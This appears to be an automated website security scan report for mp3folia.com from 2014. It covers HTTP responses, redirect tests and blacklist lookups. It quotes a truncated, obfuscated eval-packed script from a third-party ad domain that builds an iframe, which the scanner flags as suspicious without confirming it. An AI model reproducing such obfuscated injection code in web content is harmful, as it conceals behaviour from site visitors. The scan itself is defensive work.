Scanned pages/files
Request | Server response | Status |
http://mp3folia.com/ | 200 OK Content-Length: 17356 Content-Type: text/html | clean |
http://www.trialpay.com/js/offer_tp/?c=cfa5246 | 200 OK Content-Length: 56012 Content-Type: application/x-javascript | suspicious |
Suspicious code (heuristic match): the script is delivered as a packed string that an eval() wrapper reassembles at run time, and the decoded script builds an <iframe> element from percent-encoded fragments. In the decoded excerpt the frame's src comes from a url variable and its width and height from win_inner_width and win_inner_height, so the excerpt alone does not show where the frame points; the skipped portions need to be reviewed before the verdict is confirmed either way.
eval((function(s,o,d){if(s.length!=46691){var e=new Error();e.number=1;e.message=e.description="char-encoding must be set to UTF-8 in main document";throw e;}var res='';var start=0;d=d.split(',');o=o.split(';');for(var i=0;i<o.length;i++){var pr=o[i].split(',');var len=pr[0]-0;res+=s.substr(start,len)+d[pr[1]-0];start+=len;}res+=s.substr(start);return res;})("( ==decodeURIComponent('%75%6e%64%65%66%69%6e%65%64')){ ={};}( [decodeURIComponent('%63 ...[55624 bytes skipped]...
Decoded script: ...[20306 bytes skipped]... %75%33%6e%64');var left=(width-win_width)/2;if(!position)position=TRIALPAY[decodeURIComponent('%63%6f%6d%6d%6f%6e')][decodeURIComponent('%6f%76%65%72%6c%61%79')][decodeURIComponent('%5f%70%6f%73%69%74%69%6f%6e')];if(decodeURIComponent('%6c')==position){left=20;}var td_id=TRIALPAY[decodeURIComponent('%63%6f%6d%6d%6f%6e')][decodeURIComponent('%67%65%74%5f%75%6e%69%71%75%65%5f%69%64')](decodeURIComponent('%74%72%69%61%6c%70%61%79%5f%74%64'));var iframe_html=frame_id?'':decodeURIComponent('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22')+url+decodeURIComponent('%22%20%69%64%3d%22%75%72%36%35%68%66%6d%77%22%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%22%30%22%20%73%63%72%6f%6c%6c%69%6e%67%3d%22%6e%6f%22%20%73%74%79%6c%65%3d%22%77%69%64%74%68%3a')+win_inner_width+decodeURIComponent('%70%78%3b%20%68%65%69%67%68%74%3a')+win_inner_height+decodeURIComponent('%70%78%3b%20%62%6f%72%64%65%72%3a%30%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%22%3e%3c%2f%69 ...[87234 bytes skipped]...
http://files.main.bloggerstop.net/uploads/3/0/2/5/3025338/falling_snowflakes.js | 410 Gone Content-Length: 554 Content-Type: text/html | clean |
http://files.main.bloggerstop.net/test404page.js | 404 Not Found Content-Length: 1513 Content-Type: text/html | clean |
http://files.main.bloggerstop.net/ | 404 Not Found Content-Length: 1517 Content-Type: text/html | clean |
http://files.main.bloggerstop.net/uploads/3/0/2/5/3025338/snowstorm.js | 410 Gone Content-Length: 554 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mp3folia.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 08 Apr 2014 02:51:25 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 17356
Content-Type: text/html
Last-Modified: Tue, 18 Jan 2011 20:34:44 GMT
...17356 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mp3folia.com
Referer: http://www.google.com/search?q=mp3folia.com
Result:
The result is similar to the first query; no suspicious redirects were found. The two queries differ only in the Referer header, so redirects that depend on other request properties (for example User-Agent, cookies or client IP) are not covered by this check.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mp3folia.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mp3folia.com/
Result: mp3folia.com is not infected or malware details are not published yet.